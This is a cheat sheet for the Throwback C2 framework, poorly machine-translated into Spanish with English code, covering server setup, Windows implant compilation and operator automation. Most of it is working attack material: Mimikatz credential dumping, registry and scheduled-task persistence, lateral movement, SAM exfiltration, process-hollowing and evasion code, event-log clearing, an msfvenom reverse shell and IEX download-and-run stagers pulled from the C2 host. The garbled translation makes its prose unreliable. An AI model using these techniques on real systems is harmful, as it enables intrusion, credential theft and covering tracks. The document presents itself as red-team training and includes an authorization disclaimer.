Lanzamiento C2 Marco Cheat Sheet
"Clase de la hoja" idbutton id="throwback-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos
########################################################################################################################################################################################################################################################## Generar PDF seleccionado/button
■/div titulada
Sinopsis
La devolución es un implante de amortiguación HTTP/HTTPS con un servidor C2 diseñado para operaciones de equipo rojo y pruebas de penetración. Desarrollado por Silent Break Security, consta de un implante de backdoor C++ y un servidor de mando y control basado en PHP/MySQL. La devolución se centra en las comunicaciones encubiertas, la persistencia y las operaciones de robo con una huella mínima.
NOVEDAD Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y ejercicios de equipo rojo solamente. Asegúrese de tener la autorización adecuada antes de usar contra cualquier objetivo.
Instalación
Prerrequisitos
# Install dependencies (Ubuntu/Debian)
sudo apt update
sudo apt install -y apache2 mysql-server php php-mysql php-curl php-json git build-essential mingw-w64
# Install cross-compilation tools for Windows
sudo apt install -y gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
# Start services
sudo systemctl start apache2
sudo systemctl start mysql
sudo systemctl enable apache2
sudo systemctl enable mysql
MySQL Setup
-- Configure MySQL database
sudo mysql -u root -p
CREATE DATABASE throwback;
CREATE USER 'throwback'@'localhost' IDENTIFIED BY 'StrongPassword123!';
GRANT ALL PRIVILEGES ON throwback.* TO 'throwback'@'localhost';
FLUSH PRIVILEGES;
EXIT;
Instalación del servidor
# Clone Throwback repository
git clone https://github.com/silentbreaksec/Throwback.git
cd Throwback
# Set up web server directory
sudo cp -r Server/* /var/www/html/
sudo chown -R www-data:www-data /var/www/html/
sudo chmod -R 755 /var/www/html/
# Configure database connection
sudo nano /var/www/html/config.php
Archivo de configuración
<?php
// config.php - Database configuration
$servername = "localhost";
$username = "throwback";
$password = "StrongPassword123!";
$dbname = "throwback";
// C2 Server settings
$c2_host = "192.168.1.100";
$c2_port = 80;
$ssl_enabled = false;
$beacon_interval = 30;
$jitter = 10;
// Authentication
$admin_username = "admin";
$admin_password = "SecurePassword456!";
// Encryption key (change this!)
$encryption_key = "YourSecretEncryptionKey123";
// Debug mode
$debug_mode = false;
?>
Configuración de esquemas de base de datos
-- Create database tables
USE throwback;
CREATE TABLE agents (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255) UNIQUE NOT NULL,
hostname VARCHAR(255),
username VARCHAR(255),
ip_address VARCHAR(45),
os_version VARCHAR(255),
process_id INT,
process_name VARCHAR(255),
first_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
last_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
status ENUM('active', 'inactive', 'dead') DEFAULT 'active'
);
CREATE TABLE tasks (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255),
task_id VARCHAR(255) UNIQUE NOT NULL,
command TEXT,
arguments TEXT,
status ENUM('pending', 'sent', 'completed', 'failed') DEFAULT 'pending',
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
completed_at TIMESTAMP NULL,
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);
CREATE TABLE results (
id INT AUTO_INCREMENT PRIMARY KEY,
task_id VARCHAR(255),
agent_id VARCHAR(255),
output LONGTEXT,
error_output TEXT,
received_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (task_id) REFERENCES tasks(task_id),
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);
CREATE TABLE files (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255),
filename VARCHAR(255),
filepath TEXT,
filesize BIGINT,
file_hash VARCHAR(64),
upload_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);
Implant Compilation
Implante de Windows (x64)
# Compile 64-bit Windows implant
cd Implant
x86_64-w64-mingw32-gcc -o throwback_x64.exe \
-DHOST=\"192.168.1.100\" \
-DPORT=80 \
-DSSL=0 \
-DINTERVAL=30 \
-DJITTER=10 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols for smaller size
x86_64-w64-mingw32-strip throwback_x64.exe
Implante de Windows (x86)
# Compile 32-bit Windows implant
i686-w64-mingw32-gcc -o throwback_x86.exe \
-DHOST=\"192.168.1.100\" \
-DPORT=80 \
-DSSL=0 \
-DINTERVAL=30 \
-DJITTER=10 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols
i686-w64-mingw32-strip throwback_x86.exe
HTTPS Implant
# Compile with SSL support
x86_64-w64-mingw32-gcc -o throwback_https.exe \
-DHOST=\"secure.example.com\" \
-DPORT=443 \
-DSSL=1 \
-DINTERVAL=60 \
-DJITTER=20 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
Custom Build Script
#!/bin/bash
# build_implant.sh - Custom implant builder
HOST="192.168.1.100"
PORT="80"
SSL="0"
INTERVAL="30"
JITTER="10"
KEY="YourSecretEncryptionKey123"
OUTPUT_DIR="./builds"
# Create output directory
mkdir -p $OUTPUT_DIR
# Build x64 implant
echo "[+] Building x64 implant..."
x86_64-w64-mingw32-gcc -o $OUTPUT_DIR/throwback_x64.exe \
-DHOST=\"$HOST\" \
-DPORT=$PORT \
-DSSL=$SSL \
-DINTERVAL=$INTERVAL \
-DJITTER=$JITTER \
-DKEY=\"$KEY\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Build x86 implant
echo "[+] Building x86 implant..."
i686-w64-mingw32-gcc -o $OUTPUT_DIR/throwback_x86.exe \
-DHOST=\"$HOST\" \
-DPORT=$PORT \
-DSSL=$SSL \
-DINTERVAL=$INTERVAL \
-DJITTER=$JITTER \
-DKEY=\"$KEY\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols
x86_64-w64-mingw32-strip $OUTPUT_DIR/throwback_x64.exe
i686-w64-mingw32-strip $OUTPUT_DIR/throwback_x86.exe
echo "[+] Implants built successfully in $OUTPUT_DIR"
ls -la $OUTPUT_DIR/
Interfaz web
Acceso a la Interfaz
# Access web interface
http://192.168.1.100/index.php
# Login credentials (from config.php)
Username: admin
Password: SecurePassword456!
# HTTPS access (if SSL configured)
https://secure.example.com/index.php
Dashboard Overview
| Section | Description |
|---|---|
| Agents | View and manage active implants |
| Tasks | Create and monitor tasks |
| Results | View command execution results |
| Files | Manage uploaded/downloaded files |
| Logs | View system and error logs |
| Settings | Configure C2 server settings |
Agent Management
// View active agents
GET /agents.php
// Agent details
GET /agent_details.php?id=AGENT_ID
// Kill agent
POST /kill_agent.php
\\\\{
"agent_id": "AGENT_ID"
\\\\}
Ejecución del Mando
Comandos básicos
# System information
whoami # Current user
hostname # Computer name
pwd # Current directory
dir # List directory contents
cd [directory] # Change directory
type [file] # Read file contents
# Process management
tasklist # List running processes
taskkill /PID [pid] # Kill process by PID
taskkill /IM [name] # Kill process by name
# Network information
ipconfig /all # Network configuration
netstat -an # Network connections
arp -a # ARP table
route print # Routing table
Operaciones de archivo
# File management
download [file] # Download file from target
upload [local] [remote] # Upload file to target
copy [source] [dest] # Copy file
move [source] [dest] # Move file
del [file] # Delete file
mkdir [directory] # Create directory
rmdir [directory] # Remove directory
# File search
dir /s [pattern] # Search for files
findstr [pattern] [file] # Search within files
Operaciones de registro
# Registry queries
reg query [key] # Query registry key
reg add [key] /v [value] /d [data] # Add registry value
reg delete [key] /v [value] # Delete registry value
# Common registry locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Services
Operaciones provisionales
# Credential harvesting
mimikatz # Execute Mimikatz
sekurlsa::logonpasswords # Dump logon passwords
lsadump::sam # Dump SAM database
lsadump::cache # Dump cached credentials
# Token manipulation
whoami /priv # Check privileges
whoami /groups # Check group membership
Características avanzadas
Persistence Mechanisms
# Registry persistence
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"
# Scheduled task persistence
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon
# Service persistence
sc create "WindowsUpdateService" binPath= "C:\Windows\Temp\throwback.exe" start= auto
sc start "WindowsUpdateService"
# Startup folder persistence
copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
Movimiento Lateral
# Remote execution via WMI
wmic /node:[target] /user:[user] /password:[pass] process call create "cmd.exe /c [command]"
# PSExec-style execution
net use \\[target]\IPC$ /user:[user] [password]
copy throwback.exe \\[target]\C$\Windows\Temp\
sc \\[target] create "TempService" binPath= "C:\Windows\Temp\throwback.exe"
sc \\[target] start "TempService"
# PowerShell remoting
powershell -c "Invoke-Command -ComputerName [target] -Credential (Get-Credential) -ScriptBlock \\\\{[command]\\\\}"
Exfiltración de datos
# File exfiltration
download C:\Users\Administrator\Documents\sensitive.docx
download C:\Windows\System32\config\SAM
download C:\inetpub\logs\LogFiles\W3SVC1\*.log
# Database exfiltration
sqlcmd -S [server] -E -Q "SELECT * FROM sensitive_table" -o output.txt
download output.txt
# Registry exfiltration
reg export HKLM\SAM sam.reg
download sam.reg
Steganography
# Hide data in images
copy /b image.jpg + data.txt hidden.jpg
upload hidden.jpg C:\Windows\Temp\wallpaper.jpg
# Hide executables in legitimate files
copy /b legitimate.pdf + throwback.exe hidden.pdf
Automatización y scripting
PHP Automation Script
<?php
// automation.php - Automated task execution
require_once 'config.php';
class ThrowbackAutomation \\\\{
private $db;
public function __construct() \\\\{
$this->db = new mysqli($GLOBALS['servername'], $GLOBALS['username'],
$GLOBALS['password'], $GLOBALS['dbname']);
\\\\}
public function getActiveAgents() \\\\{
$result = $this->db->query("SELECT * FROM agents WHERE status = 'active'");
return $result->fetch_all(MYSQLI_ASSOC);
\\\\}
public function createTask($agent_id, $command, $arguments = '') \\\\{
$task_id = uniqid('task_');
$stmt = $this->db->prepare("INSERT INTO tasks (agent_id, task_id, command, arguments) VALUES (?, ?, ?, ?)");
$stmt->bind_param("ssss", $agent_id, $task_id, $command, $arguments);
return $stmt->execute();
\\\\}
public function automatedRecon($agent_id) \\\\{
$commands = [
'whoami',
'hostname',
'ipconfig /all',
'tasklist',
'netstat -an',
'dir C:\Users',
'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
];
foreach ($commands as $cmd) \\\\{
$this->createTask($agent_id, $cmd);
sleep(2);
\\\\}
\\\\}
public function credentialHarvesting($agent_id) \\\\{
// Check if agent has admin privileges first
$this->createTask($agent_id, 'whoami', '/priv');
sleep(5);
// Execute credential harvesting
$this->createTask($agent_id, 'mimikatz', 'sekurlsa::logonpasswords');
$this->createTask($agent_id, 'mimikatz', 'lsadump::sam');
$this->createTask($agent_id, 'mimikatz', 'lsadump::cache');
\\\\}
public function establishPersistence($agent_id) \\\\{
$persistence_commands = [
'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"',
'schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon',
'copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"'
];
foreach ($persistence_commands as $cmd) \\\\{
$this->createTask($agent_id, 'cmd', "/c $cmd");
sleep(3);
\\\\}
\\\\}
\\\\}
// Usage
$automation = new ThrowbackAutomation();
$agents = $automation->getActiveAgents();
foreach ($agents as $agent) \\\\{
echo "[+] Processing agent: \\\\{$agent['agent_id']\\\\}\n";
$automation->automatedRecon($agent['agent_id']);
// Wait before credential harvesting
sleep(30);
$automation->credentialHarvesting($agent['agent_id']);
// Establish persistence
$automation->establishPersistence($agent['agent_id']);
\\\\}
?>
Python API Client
#!/usr/bin/env python3
# throwback_client.py - Python API client for Throwback
import requests
import json
import time
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class ThrowbackClient:
def __init__(self, base_url, username, password):
self.base_url = base_url.rstrip('/')
self.session = requests.Session()
self.session.verify = False
self.authenticate(username, password)
def authenticate(self, username, password):
"""Authenticate with Throwback server"""
auth_data = \\\\{
'username': username,
'password': password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/login.php", data=auth_data)
if response.status_code == 200 and "dashboard" in response.text.lower():
print("[+] Authentication successful")
else:
raise Exception("Authentication failed")
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents.php")
return response.json()
def create_task(self, agent_id, command, arguments=""):
"""Create a new task for an agent"""
task_data = \\\\{
'agent_id': agent_id,
'command': command,
'arguments': arguments
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/tasks.php", data=task_data)
return response.json()
def get_task_results(self, task_id):
"""Get results for a specific task"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/results.php?task_id=\\\\{task_id\\\\}")
return response.json()
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
task_data = \\\\{
'agent_id': agent_id,
'command': 'download',
'arguments': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download.php", data=task_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
print(f"[+] File downloaded: \\\\{local_path\\\\}")
else:
print(f"[-] Download failed: \\\\{response.text\\\\}")
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\\Users",
"systeminfo"
]
task_ids = []
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.create_task(agent_id, cmd)
if 'task_id' in result:
task_ids.append(result['task_id'])
time.sleep(2)
return task_ids
def wait_for_results(self, task_ids, timeout=300):
"""Wait for task results"""
start_time = time.time()
completed_tasks = []
while len(completed_tasks) ``< len(task_ids) and (time.time() - start_time) < timeout:
for task_id in task_ids:
if task_id not in completed_tasks:
results = self.get_task_results(task_id)
if results and results.get('status') == 'completed':
completed_tasks.append(task_id)
print(f"[+] Task \\\{task_id\\\} completed")
print(f"Output: \\\{results.get('output', '')\\\}")
time.sleep(5)
return completed_tasks
# Usage example
if __name__ == "__main__":
client = ThrowbackClient("http://192.168.1.100", "admin", "SecurePassword456!")
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\{len(agents)\\\} active agents")
for agent in agents:
agent_id = agent['agent_id']
print(f"[+] Processing agent: \\\{agent_id\\\}")
# Perform reconnaissance
task_ids = client.automated_recon(agent_id)
# Wait for results
completed = client.wait_for_results(task_ids)
print(f"[+] Completed \\\{len(completed)\\\} tasks for agent \\\{agent_id\\\}")
Automatización PowerShell
# throwback_automation.ps1 - PowerShell automation script
function Invoke-ThrowbackAutomation \\\{
param(
[string]$ServerURL = "http://192.168.1.100",
[string]$Username = "admin",
[string]$Password = "SecurePassword456!"
)
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\{
username = $Username
password = $Password
\\\}
try \\\{
$loginResponse = Invoke-WebRequest -Uri "$ServerURL/login.php" -Method POST -Body $authData -WebSession $session
if ($loginResponse.StatusCode -eq 200) \\\{
Write-Host "[+] Authentication successful"
\\\}
\\\}
catch \\\{
Write-Error "Authentication failed: $_"
return
\\\}
# Get active agents
try \\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents.php" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\}
catch \\\{
Write-Error "Failed to get agents: $_"
return
\\\}
# Process each agent
foreach ($agent in $agents) \\\{
Write-Host "[+] Processing agent: $($agent.agent_id)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\Users",
"systeminfo"
)
foreach ($cmd in $commands) \\\{
$taskData = @\\\{
agent_id = $agent.agent_id
command = $cmd
arguments = ""
\\\}
try \\\{
$taskResponse = Invoke-WebRequest -Uri "$ServerURL/api/tasks.php" -Method POST -Body $taskData -WebSession $session
Write-Host "[+] Task created for command: $cmd"
Start-Sleep -Seconds 2
\\\}
catch \\\{
Write-Warning "Failed to create task for command '$cmd': $_"
\\\}
\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\}
\\\}
# Execute automation
Invoke-ThrowbackAutomation
Técnicas de evacuación
Evasión antiVirus
// AV evasion techniques in implant code
// String obfuscation
char obfuscated_url[] = \\\{0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x00\\\}; // "http://"
// API hashing
DWORD hash_api(char* api_name) \\\{
DWORD hash = 0;
while (*api_name) \\\{
hash = ((hash << 5) + hash) + *api_name++;
\\\}
return hash;
\\\}
// Sleep obfuscation
void obfuscated_sleep(DWORD milliseconds) \\\{
LARGE_INTEGER interval;
interval.QuadPart = -(milliseconds * 10000LL);
NtDelayExecution(FALSE, &interval);
\\\}
// Process hollowing
BOOL process_hollowing(char* target_process, char* payload) \\\{
STARTUPINFO si = \\\{0\\\};
PROCESS_INFORMATION pi = \\\{0\\\};
// Create suspended process
if (!CreateProcess(target_process, NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &si, &pi)) \\\{
return FALSE;
\\\}
// Unmap original image
ZwUnmapViewOfSection(pi.hProcess, GetImageBase(pi.hProcess));
// Allocate memory and write payload
LPVOID base_addr = VirtualAllocEx(pi.hProcess, GetImageBase(pi.hProcess),
payload_size, MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, base_addr, payload, payload_size, NULL);
// Resume execution
ResumeThread(pi.hThread);
return TRUE;
\\\}
Evasión de red
// Domain fronting implementation
char fronted_domain[] = "cdn.example.com";
char real_host[] = "c2.malicious.com";
// Custom user agents
char user_agents[][256] = \\\{
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
\\\};
// Jitter implementation
void jittered_sleep(DWORD base_interval, DWORD jitter_percent) \\\{
DWORD jitter = (base_interval * jitter_percent) / 100;
DWORD min_sleep = base_interval - jitter;
DWORD max_sleep = base_interval + jitter;
DWORD actual_sleep = min_sleep + (rand() % (max_sleep - min_sleep + 1));
Sleep(actual_sleep * 1000);
\\\}
// Traffic shaping
void shape_traffic(char* data, DWORD data_size) \\\{
// Split large data into smaller chunks
DWORD chunk_size = 1024 + (rand() % 2048); // Random chunk size
DWORD chunks = (data_size + chunk_size - 1) / chunk_size;
for (DWORD i = 0; i < chunks; i++) \\\{
DWORD current_chunk_size = min(chunk_size, data_size - (i * chunk_size));
send_chunk(data + (i * chunk_size), current_chunk_size);
// Random delay between chunks
Sleep((rand() % 5000) + 1000); // 1-6 seconds
\\\}
\\\}
Evasión de memoria
// Memory encryption
void encrypt_memory(LPVOID address, SIZE_T size, BYTE key) \\\{
BYTE* ptr = (BYTE*)address;
for (SIZE_T i = 0; i < size; i++) \\\{
ptr[i] ^= key;
\\\}
\\\}
// Heap encryption
typedef struct \\\{
LPVOID original_addr;
SIZE_T size;
BYTE key;
\\\} ENCRYPTED_HEAP;
ENCRYPTED_HEAP* allocate_encrypted_heap(SIZE_T size) \\\{
ENCRYPTED_HEAP* heap = malloc(sizeof(ENCRYPTED_HEAP));
heap->``original_addr = VirtualAlloc(NULL, size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
heap->size = size;
heap->key = (BYTE)(rand() % 256);
// Encrypt allocated memory
encrypt_memory(heap->original_addr, heap->size, heap->key);
return heap;
\\\\}
// Stack string obfuscation
void obfuscated_string_copy(char* dest, char* src, BYTE key) \\\\{
while (*src) \\\\{
*dest++ = *src++ ^ key;
\\\\}
*dest = '\0';
\\\\}
Integración con otras herramientas
Integración Metasploit
# Use Throwback with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Throwback
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
cmd /c C:\Windows\Temp\update.exe
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
Empire Integration
# Generate Empire stager
# Use Throwback for initial access, pivot to Empire
# From Throwback implant
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
execute
Cobalt Strike Integration
# Beacon integration
# Generate Cobalt Strike beacon
# Use Throwback for initial access, pivot to Beacon
# From Throwback implant
cmd /c powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Seguridad operacional
Seguridad de la comunicación
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Example HTTPS configuration
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"
# Configure Apache for HTTPS
sudo a2enmod ssl
sudo systemctl restart apache2
Evasión de análisis de tráfico
# Mimic legitimate traffic patterns
# Use common HTTP methods and headers
# Implement realistic timing
# Blend with normal network traffic
# Example legitimate traffic mimicking
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Anti-Forenseics
# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Timestomping
powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
# Secure deletion
sdelete -z -s C:\Windows\Temp\
Solución de problemas
Cuestiones comunes
# Implant not connecting
1. Check firewall rules
2. Verify web server configuration
3. Test network connectivity
4. Check database connection
# Database connection issues
# Test MySQL connection
mysql -u throwback -p -h localhost throwback
# Web server issues
# Check Apache error logs
sudo tail -f /var/log/apache2/error.log
# Check PHP errors
sudo tail -f /var/log/apache2/error.log|grep PHP
Modo de depuración
// Enable debug mode in config.php
$debug_mode = true;
// Check debug logs
tail -f /var/log/apache2/access.log
tail -f /var/log/apache2/error.log
Optimización del rendimiento
# Optimize MySQL
sudo mysql_secure_installation
# Optimize Apache
sudo a2enmod rewrite
sudo a2enmod deflate
sudo systemctl restart apache2
# Monitor system resources
htop
iotop
netstat -tulpn
Buenas prácticas
Planificación operacional
- Pre-engagement setup: Configure server and compile implants before engagement
- Protolos de comunicación: Establecer canales de comunicación C2 seguros
- Manejo de datos: Implementar la recopilación y almacenamiento de datos seguros
- ** Procedimientos de cierre**: Plan de eliminación de artefactos y limpieza operacional
- Coordinación del equipo: Utilizar C2 centralizado para la colaboración del equipo
Consideraciones de seguridad
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Implant management
# Use unique encryption keys
# Implement kill dates
# Regular implant rotation
# Secure communication channels
Documentación y presentación de informes
# Operation documentation
# Maintain detailed logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention
Recursos
- Repositorio GitHub
- Silent Break Security Blog
- Red Team Operations Guide
- MITRE ATT limitadaCK Framework
- SANS Red Team Operations
-...
*Esta hoja de trampolín proporciona una referencia completa para el uso del marco de C2 de lanzamiento. Siempre asegúrese de tener una autorización adecuada antes de realizar operaciones de equipo rojo o pruebas de penetración. *